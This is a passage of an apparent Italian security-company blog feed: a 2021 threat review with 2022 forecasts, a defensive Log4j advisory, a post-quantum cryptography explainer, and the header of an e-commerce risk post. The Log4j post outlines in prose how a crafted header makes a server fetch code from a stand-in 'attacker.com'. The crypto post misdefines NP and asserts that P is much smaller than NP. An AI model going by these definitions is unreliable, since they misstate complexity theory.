Una ricerca di Verizon ha indicato che nel 2021 si sono registrati quasi 30.000 attacchi dovuti per lo più ad attività di social engineering e server exploitation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il 25% degli attacchi mappati nel primo semestre del 2021 è stato diretto verso l’Europa&lt;/strong&gt;. Il dato è interessante perché, secondo il rapporto Clusit, nel 2020 gli attacchi gravi contro l’Europa sono stati il 17% ed erano solo l’11% nel 2019.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Poi la pausa estiva&lt;/strong&gt;, per molti ma non per tutti. In particolare, &lt;strong&gt;gli attaccanti hanno agito su due fronti in Italia: la Pubblica Amministrazione e il settore Privato&lt;/strong&gt;.
Nel primo caso, abbiamo assistito ad attacchi di impatto enorme su alcuni enti pubblici. È il caso di &lt;strong&gt;Regione Lazio&lt;/strong&gt;, dell’Ospedale San Giovanni di Roma, di &lt;strong&gt;Regione Toscana e Lombardia&lt;/strong&gt;, di SIAE e CGIL e della più recente ULSS6 Euganea, azienda ospedaliera di Padova.
L’attenzione posta dai Governi europei su questo tema è stata crescente e l’Italia non è stata da meno. &lt;strong&gt;Il Governo ha istituito l’Agenzia per la cybersicurezza nazionale e ha stanziato diverse risorse per la sicurezza informatica nel PNRR&lt;/strong&gt;. Sono segnali importanti della volontà di adeguare il comparto cyber italiano alle nuove sfide nazionali e internazionali.&lt;/p&gt;

&lt;p&gt;Da un lato il Pubblico, dall’altro il Privato. Molte eccellenze italiane sono state oggetto dei più disparati attacchi informatici. Il made in Italy era già stato colpito nel 2020 con casi quali Luxottica e Geox, ma &lt;strong&gt;nella seconda parte del 2021 c’è stata un’escalation di vittime italiane&lt;/strong&gt; che hanno contribuito a far innalzare ancora di più l’attenzione della stampa nazionale. Aziende del food come San Carlo, manifatturiere, ma anche di giocattoli (Clementoni) e del fashion (Gruppo Miroglio).
In generale, &lt;strong&gt;gli attacchi informatici dichiarati nel Belpaese sono stati 600 al giorno&lt;/strong&gt;, con una concentrazione sui settori della ricerca e dell’istruzione che ci permette di salire sul podio, al secondo posto dopo l’India, per media settimanale di attacchi.
Secondo il report “Attacks from All Angels” di Trend Micro, nel primo semestre del 2021 l’Italia risulta il quarto Paese più colpito al mondo da attacchi informatici, soprattutto per quanto riguarda i settori che trattano informazioni sensibili come le telecomunicazioni, il settore bancario e finanziario e la distribuzione.&lt;/p&gt;

&lt;p&gt;Infine, &lt;strong&gt;la seconda parte dell’anno ci ha fatto ragionare su un tema che sarà centrale anche nel 2022: le vulnerabilità&lt;/strong&gt;.
L’ultima d’impatto critico è stata quella di Log4j, ma di fatto, lo sfruttamento delle vulnerabilità note per perpetrare attacchi informatici è aumentato del 41% nel corso dell’anno passato, secondo solo all’utilizzo di malware (43%).
Rimangono quindi una priorità il monitoraggio delle vulnerabilità, l’aggiornamento dei sistemi, le finestre di manutenzioni ordinarie e di emergenza. Processi che sono strutturati ancora in poche organizzazioni.
Apprendimento: &lt;strong&gt;l’errore non è ammesso&lt;/strong&gt;. &lt;strong&gt;Lasciare aperta non una porta, ma uno spiraglio, permetterà di subire un attacco in tempi da record&lt;/strong&gt;. Sfruttando le vulnerabilità più note – come quelle che abbiamo visto protagoniste di recente – stimiamo che gli attaccanti potranno agire in meno di 48 ore. Nel 2021 questo tempo si aggirava intorno alle 48-72 ore.&lt;/p&gt;

&lt;h2 id=&#34;cosa-aspettarci-dal-2022&#34;&gt;Cosa aspettarci dal 2022&lt;/h2&gt;

&lt;h3 id=&#34;cloud&#34;&gt;Cloud&lt;/h3&gt;

&lt;p&gt;Il Cloud, con la sua capacità apparentemente infinita di archiviare ed elaborare grandi quantità di dati, ha permesso alle aziende di passare al lavoro remoto con relativa facilità dopo lo scoppio della pandemia di Covid-19. Nel prossimo anno &lt;strong&gt;la migrazione al Cloud rimarrà un aspetto chiave per le operazioni aziendali&lt;/strong&gt;. Gartner prevede che la spesa globale per i servizi Cloud raggiungerà oltre 482 miliardi di dollari nel 2022, con un aumento del 54% rispetto ai 313 miliardi di dollari del 2020. E se le aziende migrano sulla nuvola, i cyber-criminali non saranno da meno.&lt;/p&gt;

&lt;h3 id=&#34;supply-chain&#34;&gt;Supply Chain&lt;/h3&gt;

&lt;p&gt;La pandemia di Covid-19 ha puntato i riflettori sulla fragilità delle supply chain. Enormi carenze e ritardi economici sono sorti a causa di diversi fattori, tra cui l&amp;rsquo;aumento della domanda e la carenza di container e di lavoratori. Quando i problemi delle supply chain sono diventati un problema mondiale, tutti hanno compreso il valore di queste catene, compresi i cyber criminali che non si sono fatti sfuggire il potenziale di attacchi diretti alle stesse.&lt;/p&gt;

&lt;p&gt;Sfruttando ulteriormente l’interruzione della catena di approvvigionamento, i threat actors potranno portare un’evoluzione nel modello di “estorsione quadrupla” nel 2022. Sfrutteranno al massimo i loro attacchi informatici spingendo sulle vittime (immaginiamo nomi sempre più importanti) per pagare ingenti somme di denaro tramite una quadruplice tecnica di estorsione: tenere i dati critici della vittima per il riscatto, minacciare di far trapelare i dati e pubblicizzare la violazione, minacciare di perseguire i clienti della vittima e attaccare la catena di approvvigionamento o i fornitori della vittima.&lt;/p&gt;

&lt;h3 id=&#34;iot&#34;&gt;IoT&lt;/h3&gt;

&lt;p&gt;Si prevede che il numero di dispositivi connessi, Internet of Things (IoT), raggiungerà i 18 miliardi entro il 2022. Una conseguenza di ciò è un numero maggiore di potenziali punti di accesso per i criminali informatici che cercano di accedere a sistemi digitali sicuri.
Oltre che più diffuso, &lt;strong&gt;nel 2022 l&amp;rsquo;IoT diventerà anche più sofisticato&lt;/strong&gt;. Molte organizzazioni sono ora impegnate nello sviluppo di &amp;ldquo;digital twins&amp;rdquo; - simulazioni digitali che rispecchiano interi sistemi e business. Questi modelli sono spesso collegati a sistemi operativi interni all’azienda (fonte: Forbes).&lt;/p&gt;

&lt;p&gt;Questo utilizzo massivo dell’IoT riguarda anche gli utenti, che avranno vita sempre più facilitata grazie ai dispositivi connessi. Non solo wearable e smart devices, parliamo di case sempre più connesse, assistenti vocali e auto “intelligenti”.&lt;/p&gt;

&lt;p&gt;Se nel 2021 il numero di user di device mobili in tutto il mondo si è attestato a 7,1 miliardi, le previsioni suggeriscono che probabilmente salirà a 7,26 miliardi nel 2022. Nel 2025, questo numero potrebbe raggiungere i 7,49 miliardi (Statista).
&lt;strong&gt;Più utenti, più connessioni e più complessità relative alla cyber security&lt;/strong&gt;.&lt;/p&gt;

&lt;h3 id=&#34;cybercrime-as-a-service&#34;&gt;Cybercrime as a Service&lt;/h3&gt;

&lt;p&gt;Se il ransomware da un lato non ha mai smesso di essere un “trend”, dall’altro ha la capacità di rinnovarsi continuamente. &lt;strong&gt;Per il 2022 stimiamo che il malware as-a service, MaaS o RaaS&lt;/strong&gt;, la variante meno rischiosa dell’attacco malware diretto, &lt;strong&gt;possa prendersi sempre più spazio&lt;/strong&gt;. Per la cronaca, un “pacchetto” costa dai 60 ai 650 dollari e, in caso di attacco andato a buon fine, il profitto è del 70% per chi compra e del 30% per chi vende.
Ne abbiamo parlato approfonditamente anche nel &lt;a href=&#34;https://bit.ly/book-cybergon&#34;&gt;nostro ultimo libro&lt;/a&gt;.&lt;/p&gt;

&lt;h3 id=&#34;non-fungible-token&#34;&gt;Non-Fungible Token&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Nel 2022, è probabile che vedremo NFT ovunque&lt;/strong&gt;; questo include film, programmi TV, libri e altro ancora. Gli NFT fanno parte dell&amp;rsquo;economia digitale e stanno diventando mainstream perché consentono alle persone di possedere qualcosa che rappresenta una parte di qualcosa di più grande di loro - un&amp;rsquo;opera d&amp;rsquo;arte o un personaggio, per esempio. L&amp;rsquo;economia digitale è composta da una varietà di mercati online, tra cui videogame, immobili virtuali e piattaforme di social media come Facebook.&lt;/p&gt;

&lt;p&gt;Ricordiamo che il principio secondo cui agiscono i cyber-criminali è quasi sempre il #followthemoney. Ecco perché bisogna considerare la tendenza degli NFT anche dal punto di vista della sicurezza.&lt;/p&gt;

&lt;h3 id=&#34;6g-is-the-new-5g&#34;&gt;6G is the new 5G&lt;/h3&gt;

&lt;p&gt;La pandemia ha pesato sul mobile, con il numero di abbonati che ha subito un leggero calo a livello globale. Ciò detto, la marcia del 5G non si arresta e il 2021 si è chiuso con 500 milioni di abbonati. secondo stime di ABI Research raggiungerà quota 2,6 miliardi di sottoscrittori nel 2026 a fronte di ricavi per 942 miliardi di dollari.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Questa espansione sta già facendo spazio a nuovi discorsi legati alla prossima tecnologia: 6G&lt;/strong&gt;. Nel 2021 LG ha iniziato un progetto di sviluppo legato al 6G e le previsioni attuali indicano la possibile commercializzazione delle soluzioni entro i prossimi 4 anni, con la piena normalizzazione di queste tecnologie entro il 2025. Siamo davvero pronti?&lt;/p&gt;

&lt;h2 id=&#34;le-nostre-considerazioni&#34;&gt;Le nostre considerazioni&lt;/h2&gt;

&lt;h3 id=&#34;attacchi-verso-aziende-italiane&#34;&gt;Attacchi verso aziende italiane&lt;/h3&gt;

&lt;p&gt;L’esperienza vissuta sul campo durante questo 2021 ci ha permesso di misurare un trend preoccupante.
Confrontando il primo e il secondo semestre del 2021 &lt;strong&gt;abbiamo evidenziato un raddoppio (+200%) degli incident legati ad attacchi verso aziende italiane&lt;/strong&gt;.
In particolare, &lt;strong&gt;il 35% avviene attraverso attacchi ransomware&lt;/strong&gt; e in questi casi la durata media della presenza degli attaccanti all’interno della rete del cliente si attesta tra le 2 e le 5 settimane.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Il 25% è legato al furto delle credenziali aziendali&lt;/strong&gt;, con lo scopo di compiere attacchi man in the middle. La presenza degli attaccanti in questi casi supera i 2 mesi, proprio perché l’obiettivo è di studiare e comprendere al meglio i flussi di comunicazione dei clienti.&lt;/p&gt;

&lt;h3 id=&#34;password-e-multi-factor&#34;&gt;Password e Multi-Factor&lt;/h3&gt;

&lt;p&gt;Nel corso del 2021 abbiamo rilevato un &lt;strong&gt;aumento significativo di attacchi legati al furto delle credenziali utente del 180% rispetto al 2020&lt;/strong&gt;, con un trend preoccupante sull’ultimo trimestre.
Questa tendenza ci pone di fronte alla necessità oggettiva di implementare in azienda sistemi di autenticazione di nuova generazione.
Stimiamo, ad esempio, che solo il 30% delle aziende che utilizzano sistemi di collaborazione Cloud come Office365 abbiano attivo un sistema di monitoraggio attivo degli accessi sospetti.
Parliamo di “risky users” quando vengono rilevati accessi alla casella di posta da sorgenti non usuali (ad esempio accesso da un indirizzo estero verso una casella utilizzata principalmente in Italia).
I portali Azure tracciano e visualizzano queste informazioni, ma come sempre è necessario monitorare e agire di fronte a queste segnalazioni.&lt;/p&gt;

&lt;p&gt;Se il doppio fattore di autenticazione (MFA) per accedere alla posta elettronica aziendale era un “nice-to-have” per il 2021, sarà indispensabile per proteggere l’azienda nel corso del 2022.
&lt;strong&gt;La sicurezza in azienda può essere ottenuta solo con la collaborazione di tutti ed è quindi necessario chiedere ai dipendenti di abituarsi ad una nuova operatività&lt;/strong&gt;.
Per ottenere il risultato atteso, un progetto di MFA deve essere affrontato ascoltando le necessità delle varie funzioni aziendali e personalizzando le policy in base alle diverse esigenze.
L’ultimo step sarà quello di passare ad un sistema di autenticazione password-less attraverso l’utilizzo di un dispositivo trusted.&lt;/p&gt;

&lt;h3 id=&#34;sistemi-di-protezione-questione-di-efficacia&#34;&gt;Sistemi di Protezione: questione di efficacia&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Con la continua evoluzione e complessità degli attacchi, le protezioni aziendali devono evolvere alla stessa velocità&lt;/strong&gt;.
Stimiamo che se un’azienda ha implementato un sistema di protezione dei dispositivi utente, sistemi server e network nel corso del 2020, senza adattarlo alle nuove minacce, potrebbe perdere fino al 25% di efficacia nel corso dell’anno successivo e fino al 50% nel corso dei due anni successivi.&lt;/p&gt;

&lt;p&gt;Nonostante gli investimenti in ambito cyber security da parte delle aziende siano in costante crescita da pochi anni a oggi, sono ancora poche le aziende aziende italiane (stimiamo circa il 15%) che hanno affrontato nel corso del 2021 progetti di adozione di protezione avanzata basato su intelligenza artificiale e analisi. Se fino a qualche anno fa parlare di antivirus era un ottimo punto di partenza, oggi non è più sufficiente ed è necessario valutare soluzioni di XDR (Extended Detection and Response).&lt;/p&gt;

&lt;p&gt;Anche le polizze assicurative legate al rischio cyber richiedono sempre più spesso la compilazione di questionari approfonditi sul livello di protezione aziendale. &lt;strong&gt;Il SOC non è più un nice to have&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Buon 2022 dal team CybergON&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Vulnerabilità Apache Log4j: le 5 cose da fare</title>
         <link>https://blog.cybergon.com/posts/vulnerabilita-apache-log4j-le-5-cose-da-fare/</link>
         <pubDate>Wed, 15 Dec 2021 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Simone Errico</author>
         
               
             <author>Ilaria Martinelli</author>
         
               
             <author>Samuele Salvia</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/vulnerabilita-apache-log4j-le-5-cose-da-fare/</guid>
         <description>

&lt;p&gt;Il 9 dicembre è stata resa pubblica una &lt;strong&gt;vulnerabilità (CVE-2021-44228) che coinvolge la libreria Java Apache Log4j&lt;/strong&gt;, largamente utilizzata a livello mondiale.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/log4j/log4j-copertina.png&#34; alt=&#34;Log4j&#34; /&gt;&lt;/p&gt;

&lt;p&gt;La vulnerabilità di livello critico, a cui è stato assegnato il punteggio massimo (CVSSv3: 10), permette la &lt;strong&gt;Remote Code Execution (RCE)&lt;/strong&gt; senza autenticazione, consentendo all’attaccante l’esecuzione di codice arbitrario a danno dell’applicazione affetta.&lt;/p&gt;

&lt;p&gt;Tale vulnerabilità è stata soprannominata &lt;strong&gt;Log4Shell&lt;/strong&gt; ed interessa le &lt;strong&gt;versioni dalla 2.0-beta 9 alla 2.14.1&lt;/strong&gt; della libreria.&lt;/p&gt;

&lt;h2 id=&#34;chi-è-stato-o-potrebbe-essere-colpito&#34;&gt;Chi è stato o potrebbe essere colpito&lt;/h2&gt;

&lt;p&gt;Per capire l’entità della vulnerabilità basti pensare che Java viene usato in &lt;strong&gt;oltre 3.5 miliardi di siti web&lt;/strong&gt; e Log4j è una delle librerie più usate per il logging.&lt;/p&gt;

&lt;p&gt;Anche Ingenuity, l’elicottero della NASA atterrato sul suolo di Marte lo scorso febbraio, usa Log4j nel proprio software, come la stessa Apache ha reso noto sul proprio account Twitter.
Altre aziende che sono state colpite sono:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Apple&lt;/li&gt;
&lt;li&gt;Tencent&lt;/li&gt;
&lt;li&gt;Twitter&lt;/li&gt;
&lt;li&gt;CloudFlare&lt;/li&gt;
&lt;li&gt;Amazon&lt;/li&gt;
&lt;li&gt;Tesla&lt;/li&gt;
&lt;li&gt;Apache&lt;/li&gt;
&lt;li&gt;Redis&lt;/li&gt;
&lt;li&gt;VMWare&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Una &lt;strong&gt;lista, in continuo aggiornamento, dei servizi e delle applicazioni&lt;/strong&gt; che utilizzano Log4j è invece &lt;a href=&#34;https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592&#34;&gt;consultabile cliccando qui.&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Le grandi aziende non sono le sole ad essere impattate: la vulnerabilità, infatti, riguarda anche il singolo utente. Se gli attaccanti colpiscono l’azienda, anche chi usufruisce dei servizi di quell’azienda potrebbe veder compromessi i propri dati personali.&lt;/p&gt;

&lt;h2 id=&#34;5-cose-da-fare&#34;&gt;5 cose da fare&lt;/h2&gt;

&lt;p&gt;Se da un lato Apache ha provveduto a &lt;strong&gt;rilasciare la versione Log4j 2.15.0&lt;/strong&gt; per risolvere il problema di sicurezza, dall’altro sono tante le aziende che rimangono facilmente attaccabili.&lt;/p&gt;

&lt;p&gt;Sui nostri clienti a servizio sono state eseguite le seguenti analisi, che consigliamo di effettuare:&lt;/p&gt;

&lt;h3 id=&#34;1-osint-del-perimetro-pubblico&#34;&gt;1. OSINT del perimetro pubblico:&lt;/h3&gt;

&lt;p&gt;Utilizzando tool esterni (ad esempio, &lt;a href=&#34;https://www.shodan.io/&#34;&gt;Shodan&lt;/a&gt;) si possono valutare le &lt;strong&gt;esposizioni dei propri IP pubblici&lt;/strong&gt;. È necessario poi bloccare sull’IPS o sul firewall tutte le connessioni da e verso gli indirizzi IP segnalati come IoC.&lt;/p&gt;

&lt;h3 id=&#34;2-scansione-del-perimetro-interno&#34;&gt;2. Scansione del perimetro interno:&lt;/h3&gt;

&lt;p&gt;Questo può essere effettuato tramite un &lt;strong&gt;vulnerability assessment puntuale&lt;/strong&gt; sugli applicativi e sui sistemi. La verifica va fatta non solo su perimetro esterno ed interno, ma anche su tutti i servizi cloud. Anche in questo caso si può provvedere a isolare le macchine vulnerabili.&lt;/p&gt;

&lt;h3 id=&#34;3-detection-sulla-rete&#34;&gt;3. Detection sulla rete:&lt;/h3&gt;

&lt;p&gt;Tramite IDS e tramite l’analisi e correlazione dei logs di sistema e applicativi, un team di specialisti può &lt;strong&gt;individuare tempestivamente i tentativi di compromissione&lt;/strong&gt; dei sistemi aziendali e prevenire o limitare i danni.&lt;/p&gt;

&lt;h3 id=&#34;4-aggiornamento-di-nuove-policy&#34;&gt;4. Aggiornamento di nuove policy:&lt;/h3&gt;

&lt;p&gt;Consigliamo di effettuare l&amp;rsquo;aggiornamento sia lato &lt;strong&gt;detection (firme IDS) sia lato prevention (IPS)&lt;/strong&gt;, in caso di pubblicazione di nuovi IoC.&lt;/p&gt;

&lt;h3 id=&#34;5-patch&#34;&gt;5. Patch:&lt;/h3&gt;

&lt;p&gt;Nel caso in cui non sia ancora stato fatto, il nostro consiglio è quello di &lt;strong&gt;installare Log4j 2&lt;/strong&gt; nella versione 2.15.0 &lt;a href=&#34;https://logging.apache.org/log4j/2.x/&#34;&gt;rilasciata da Apache&lt;/a&gt;. Un’ulteriore vulnerabilità, meno impattante della Log4Shell, è uscita ieri; pertanto può essere applicata direttamente la patch 2.16.0 che risolve anche quest’ultima.
Nel caso l&amp;rsquo;attività di patching non fosse possibile, si può ridurre la superficie di attacco tramite le &lt;strong&gt;azioni di mitigation&lt;/strong&gt; &lt;a href=&#34;https://logging.apache.org/log4j/2.x/security.html&#34;&gt;consigliate da Log4j qui&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Le organizzazioni con applicazioni web e non basate su Java dovrebbero valutare di contattare i fornitori o assicurarsi di aver eseguito l’ultima versione disponibile delle applicazioni in uso.&lt;/p&gt;

&lt;p&gt;In caso di compromissione o per effettuare vulnerability assessment su perimetro pubblico e interno, può essere fatta una richiesta al nostro SOC, scrivendo una mail a &lt;strong&gt;sos@cybergon.com&lt;/strong&gt;.&lt;/p&gt;

&lt;h2 id=&#34;come-funziona-l-attacco-che-sfrutta-log4j&#34;&gt;Come funziona l&amp;rsquo;attacco che sfrutta Log4j&lt;/h2&gt;

&lt;p&gt;Già il 24 novembre 2021, Chen Zhaojun, del team Alibaba Cloud Security, aveva dato comunicazione della vulnerabilità Log4Shell; l’exploit in the wild della stessa è, tuttavia, iniziato alcuni giorni dopo.&lt;/p&gt;

&lt;p&gt;L’attacco può essere diviso in &lt;strong&gt;due diverse fasi&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Nella prima l’attaccante manda una richiesta ad un server vulnerabile con un campo, in questo caso User-Agent, che sa o che ipotizza che verrà passato dal server stesso a Log4j.&lt;/p&gt;

&lt;p&gt;Log4j riceve la stringa passata dall’attaccante e contatta “attacker.com” tramite JNDI (Java Naming and Directory Interface).&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/log4j/log4j-1.png&#34; alt=&#34;Fasa_1&#34; /&gt;
&lt;em&gt;Img source: fastly.com&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nella seconda fase “attacker.com” fornisce in risposta un oggetto Java, con codice arbitrario, e il server vulnerabile lo esegue.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/log4j/log4j-2.png&#34; alt=&#34;Fase_2&#34; /&gt;
&lt;em&gt;Img source: fastly.com&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Nonostante l’attacco possa sembrare relativamente semplice, questa &lt;strong&gt;vulnerabilità risulta complessa da gestire&lt;/strong&gt;: la difficoltà sta nel capire se nello sviluppo dei propri software è stato utilizzato Log4j e in che versione.&lt;/p&gt;

&lt;p&gt;La &lt;strong&gt;pericolosità di Log4Shell&lt;/strong&gt; non riguarda solo il fatto che gli attaccanti possono avere il controllo del sistema, ma piuttosto si concentra sulla facilità con cui esperti e non traggono vantaggio sfruttando questa vulnerabilità.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>La crittografia nell&#39;era dei computer quantistici</title>
         <link>https://blog.cybergon.com/posts/la-crittografia-nell-era-dei-computer-quantistici/</link>
         <pubDate>Thu, 02 Dec 2021 10:16:00 +0000</pubDate>
         <authors>
         
              
             <author>Marco Prosdocimi</author>
         
         </authors>
         <guid>https://blog.cybergon.com/posts/la-crittografia-nell-era-dei-computer-quantistici/</guid>
         <description>

&lt;p&gt;Si sta affermando sempre di più &lt;strong&gt;l’importanza dei computer quantistici&lt;/strong&gt; e di come potranno portare una rivoluzione in tutti i campi delle scienze. Assieme a nuove &lt;strong&gt;possibilità&lt;/strong&gt;, l’era delle macchine quantistiche porterà con sé &lt;strong&gt;molte sfide&lt;/strong&gt; per l’informatica, soprattutto &lt;strong&gt;per quanto riguarda la crittografia&lt;/strong&gt;.&lt;/p&gt;

&lt;h2 id=&#34;la-scrittura-di-messaggi-segreti&#34;&gt;La scrittura di messaggi segreti&lt;/h2&gt;

&lt;p&gt;La crittografia può essere definita come &lt;strong&gt;l’insieme delle tecniche che ci permette di scrivere messaggi segreti e impedire a persone non autorizzate di leggerli.&lt;/strong&gt; Esse prevedono l’utilizzo di un algoritmo matematico e di una chiave, che altro non è che un dato numerico.&lt;/p&gt;

&lt;p&gt;Il &lt;strong&gt;procedimento&lt;/strong&gt; può essere riassunto nel modo seguente:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Il messaggio in chiaro (leggibile) viene cifrato e reso illeggibile attraverso un procedimento matematico che usa una chiave.&lt;/li&gt;
&lt;li&gt;Viene trasmesso il messaggio cifrato.&lt;/li&gt;
&lt;li&gt;Quando il messaggio raggiunge il destinatario viene ri-trasformato in quello originale.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Esistono due famiglie principali di algoritmi crittografici: &lt;strong&gt;simmetrici e asimmetrici.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Gli algoritmi simmetrici &lt;strong&gt;utilizzano la stessa chiave per cifrare e decifrare&lt;/strong&gt; e quindi, se il mittente e il destinatario condividono una chiave, la possono usare per &lt;strong&gt;comunicare in maniera sicura.&lt;/strong&gt;
La crittografia simmetrica è &lt;strong&gt;molto potente e resistente ma ha in sé un grandissimo problema&lt;/strong&gt;: come faccio a trasmettere la chiave al destinatario? Se un ipotetico avversario se ne impossessasse, riuscirebbe a leggere tutti i messaggi scambiati.&lt;/p&gt;

&lt;p&gt;Questo problema ha afflitto gli informatici e i matematici fino agli anni ‘60 quando furono inventati i primi &lt;strong&gt;algoritmi asimmetrici&lt;/strong&gt;.
Questi sistemi prevedono che &lt;strong&gt;ogni persona possegga due diverse chiavi&lt;/strong&gt;. Una pubblica, utilizzata solo per cifrare, e una privata, che permette di decifrare i messaggi.&lt;/p&gt;

&lt;p&gt;Questo sistema risolve il problema della trasmissione delle chiavi. Chiunque voglia trasmettere un messaggio basta che ottenga la chiave pubblica del destinatario e la usi per cifrare il messaggio.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/crittografia/crittografia-1.PNG&#34; alt=&#34;symmetric-asymmetric-encryption&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Per capire meglio questo concetto facciamo un &lt;strong&gt;esempio pratico&lt;/strong&gt;: quando navighiamo in rete e ci sentiamo sicuri vedendo i siti HTTPS (evidenziati da un lucchetto verde) dovremmo sapere che dietro questa protezione vi è un algoritmo di cifratura asimmetrica.&lt;/p&gt;

&lt;p&gt;Nel momento in cui accediamo ad un sito, possiamo leggere la sua chiave pubblica e quando, poi, inviamo informazioni, la usiamo per cifrarle. Una volta che i messaggi saranno arrivati a destinazione, il proprietario del sito utilizzerà la sua chiave privata per decifrare i messaggi.
Ovviamente si suppone che la chiave privata rimanga segreta e conosciuta solo dal proprietario del sito.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/crittografia/crittografia-2.png&#34; alt=&#34;public-key-certificate&#34; /&gt;&lt;/p&gt;

&lt;p&gt;In realtà, i più esperti sapranno che il sistema è leggermente più complesso di così, ma questo esempio è sufficiente per arrivare a parlare di crittografia post-quantistica.&lt;/p&gt;

&lt;h2 id=&#34;la-classificazione-dei-problemi&#34;&gt;La classificazione dei problemi&lt;/h2&gt;

&lt;p&gt;Gli &lt;strong&gt;schemi di cifratura asimmetrici&lt;/strong&gt; si basano sull’assunzione che &lt;strong&gt;esistano problemi che risultano essere difficili da calcolare&lt;/strong&gt; in tempi brevi persino dal più potente dei computer.&lt;/p&gt;

&lt;p&gt;In informatica esistono degli studi che si occupano di &lt;strong&gt;dividere i problemi e di raggrupparli per tipologie,&lt;/strong&gt; dette classi.
Un problema si definisce appartenente alla classe P (polinomiale) se esiste un algoritmo che, quando viene eseguito da un computer, è in grado di arrivare ad una soluzione in tempo accettabile.&lt;/p&gt;

&lt;p&gt;Per coloro che preferiscono una definizione più formale è possibile definire un problema in P nel modo seguente:&lt;/p&gt;

&lt;p&gt;Un problema appartiene alla classe P se esiste un algoritmo sempre corretto che richiede, nel caso peggiore, un numero di operazioni elementari f(n) = O(n^d), dove d è una costante e n è la dimensione dell&amp;rsquo;istanza.&lt;/p&gt;

&lt;p&gt;Esiste poi una classe NP (polinomiale non deterministico) che, semplificando al massimo, possiamo dire racchiuda in sé tutti i problemi che una macchina può risolvere a prescindere dal tempo impiegato.&lt;/p&gt;

&lt;p&gt;Come possiamo notare dalla figura l’insieme P è molto più piccolo dell’insieme NP, quindi esistono effettivamente molti problemi che un computer tradizionale non riesce a risolvere in tempi brevi.
Facciamo il più classico degli esempi: la fattorizzazione di un numero.&lt;/p&gt;

&lt;p&gt;Consideriamo un numero &lt;strong&gt;N&lt;/strong&gt; che è dato dal prodotto di 2 numeri primi &lt;strong&gt;P&lt;/strong&gt; e &lt;strong&gt;Q&lt;/strong&gt; (N = P x Q). Se &lt;strong&gt;N&lt;/strong&gt; è abbastanza grande (ad oggi 4096 bit) anche il computer più potente del mondo impiegherebbe secoli a ricavare &lt;strong&gt;P&lt;/strong&gt; e &lt;strong&gt;Q&lt;/strong&gt; partendo da &lt;strong&gt;N&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;La fattorizzazione di un numero, come anche il calcolo del logaritmo discreto, sono i problemi che oggi sono usati negli algoritmi di crittografia asimmetrica che ci proteggono ogni volta che navighiamo sul web.&lt;/p&gt;

&lt;p&gt;&lt;img src=&#34;https://blog.cybergon.com/imgs/crittografia/crittografia-3.jpg&#34; alt=&#34;fattorizzazione-numero&#34; /&gt;&lt;/p&gt;

&lt;p&gt;Definiamo ora una classe chiamata BQP che comprende tutti quei problemi risolvibili in tempi accettabili da un computer quantistico. Possiamo dire che un computer quantistico sia più potente di un computer tradizionale, nonostante non sia ancora chiaro per noi come poterli produrre in modo economico.&lt;/p&gt;

&lt;p&gt;Come si osserva dall’immagine, la classe BQP è più grande della classe P e, inoltre, comprende proprio i problemi di fattorizzazione e calcolo del logaritmo discreto che utilizziamo.
Questo vuol dire che un &lt;strong&gt;computer quantistico può arrivare a decifrare tutti i messaggi che ad oggi utilizzano crittografia asimmetrica&lt;/strong&gt;, che ricordiamo essere quella che utilizziamo quando navighiamo o anche quando andiamo a fare un pagamento con una carta elettronica.&lt;/p&gt;

&lt;h2 id=&#34;la-soluzione&#34;&gt;La soluzione&lt;/h2&gt;

&lt;p&gt;Si è reso necessario trovare problemi che siano fuori dalla classe BQP e che possano essere usati per la crittografia asimmetrica. Fortunatamente per noi, in questi anni è stato fatto uno sforzo a livello mondiale per cercare di creare algoritmi di crittografia asimmetrica che da qui a qualche anno andranno a sostituire quelli che usiamo tutti i giorni.&lt;/p&gt;

&lt;p&gt;I &lt;strong&gt;problemi identificati&lt;/strong&gt; per la crittografia che neanche un computer quantistico riesce a risolvere in modo rapido sono: &lt;strong&gt;codici di correzione di errori e crittografia lattice-based&lt;/strong&gt; (particolari strutture matematiche).
Nel 2017, &lt;a href=&#34;https://csrc.nist.gov/projects/post-quantum-cryptography&#34;&gt;il NIST&lt;/a&gt; ha indetto un “concorso” a livello mondiale per raccogliere i nuovi schemi crittografici e alla fine del 2021 dovrebbero essere proclamati i vincitori.&lt;/p&gt;

&lt;p&gt;Il NIST, in seguito, procederà a pubblicare tutta la documentazione necessaria per far sì che tutti i protocolli in uso oggi possano adattarsi ai nuovi standard crittografici post quantistici, utilizzando le nuove funzioni matematiche.&lt;/p&gt;
</description>
       </item>
       
       <item>
         <title>Black Friday e Cyber Monday: i rischi informatici dell’e-commerce</title>
         <link>https://blog.cybergon.com/posts/black-friday-e-cyber-monday-i-rischi-informatici-dell-e-commerce/</link>
         <pubDate>Tue, 16 Nov 2021 14:16:01 +0000</pubDate>
         <authors>
         
              
             <author>Jeremy Moeys</author>
         
         </authors>
